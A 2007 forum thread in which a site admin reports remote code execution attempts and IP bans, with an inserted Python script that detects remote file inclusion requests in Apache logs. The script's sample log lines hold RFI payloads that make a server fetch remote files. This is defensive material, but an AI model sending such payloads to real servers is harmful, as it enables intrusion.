Little Bastards

Postby peg » Tue Sep 18, 2007 4:00 pm

So, it seems that someone is trying some remote code execution on our server. I don't know for what purpose (obviously no good) but I have banned the following IP Addresses.

These IP Addresses themselves may not be the culprits, but they are then being exploited by those culprits. So I needed to resolve it and that was ONE of the things I have done.

These IP Addresses were trying to launch any one of the following files (many of which have been shut down).

Now before you go investigating those links... BE WARNED that at least one of them is actually a link to a virus, which is a PHP backdoor. If you are running PHP on a Windows machine, you will be susceptible to it.

Fortunately, it appears that they have not been able to gain access to the resources they wanted, but I am still going through logs. The downside is that they have a net effect of shutting down the MySQL Server (creating errors in the various applications).
- peg -

-- eschew obfuscation!! --
If we were able to help you please consider making a donation to support this site.
Donation button at the top of page.
peg
Site Admin
 
Posts: 827
Joined: Sun Feb 09, 2003 6:25 am
Location: United States
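The pattern peg describes (requests that try to make the server fetch and run a remote file such as cmd.txt or id.txt, followed by banning the source addresses) is what a remote file inclusion scan looks like in an Apache access log. The following is an added example, not code from the post or this site: it scans constructed combined-format log lines, flags requests whose query parameters carry a remote URL, ranks the classic trailing-"?" form higher, and tallies candidate source IPs. All log lines, IPs and URLs below are made up for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format lines (not real traffic; RFC 5737 test addresses).
SAMPLE_LOG = """\
203.0.113.10 - - [18/Sep/2007:15:42:01 -0400] "GET /index.php?page=http://192.0.2.7/cmd.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.10 - - [18/Sep/2007:15:42:02 -0400] "GET /forum/viewtopic.php?f=1&t=42 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.5 - - [18/Sep/2007:15:43:10 -0400] "GET /phpbb/includes/functions.php?phpbb_root_path=http%3A%2F%2F192.0.2.9%2Fid.txt%3F%3F HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
192.0.2.22 - - [18/Sep/2007:15:44:00 -0400] "GET /about.php?ref=https://example.com/page HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# Client IP, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)


def classify(url):
    """A remote URL ending in '?' is the textbook RFI form (it swallows whatever the
    vulnerable script appends); any other remote URL in a parameter only needs review."""
    return "high" if url.endswith("?") else "review"


def rfi_params(target):
    """Return [(param, decoded_url, level)] for query parameters whose value is a remote URL.
    parse_qsl percent-decodes values, so encoded 'http%3A%2F%2F' forms are caught too."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value):
            hits.append((name, value, classify(value)))
    return hits


def scan_log(text):
    """Return {client_ip: [(param, url, level), ...]} for requests that look like RFI attempts."""
    suspects = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = rfi_params(m.group("target"))
        if hits:
            suspects.setdefault(m.group("ip"), []).extend(hits)
    return suspects


def ban_candidates(suspects):
    """IPs with at least one high-confidence hit, sorted; 'review'-only IPs are left for a human,
    which matters because (as the post notes) many sources are themselves compromised hosts."""
    return sorted(ip for ip, hits in suspects.items() if any(h[2] == "high" for h in hits))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for ip, hits in found.items():
        print(ip, hits)
    print("ban candidates:", ban_candidates(found))
```

Run against a real access_log the heuristic will also flag legitimate redirect or referrer parameters (the `ref=` line above lands in "review"), so allow-list those before feeding the "high" list into a firewall rule.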

Postby peg » Thu Sep 27, 2007 1:34 am

So now the attack has shifted modes. I have blocked the "Exploit" that was being used to shut down the MySQL Server. So now they are trying to exploit a vulnerability in Apache.

So in the process of "Patching" things, we have expanded the list of Blocked IP Addresses. The list is too large to post, but suffice it to say, we are keeping up with them; occasionally, they get ahead and the site crashes.

There are mechanisms in place to attempt to recover from those crashes, but it's on a timed event (trying to balance the performance with reliability).

Please be patient. This only goes to show that we are doing good and hurting them.

Everyone keep up the good work.
- peg -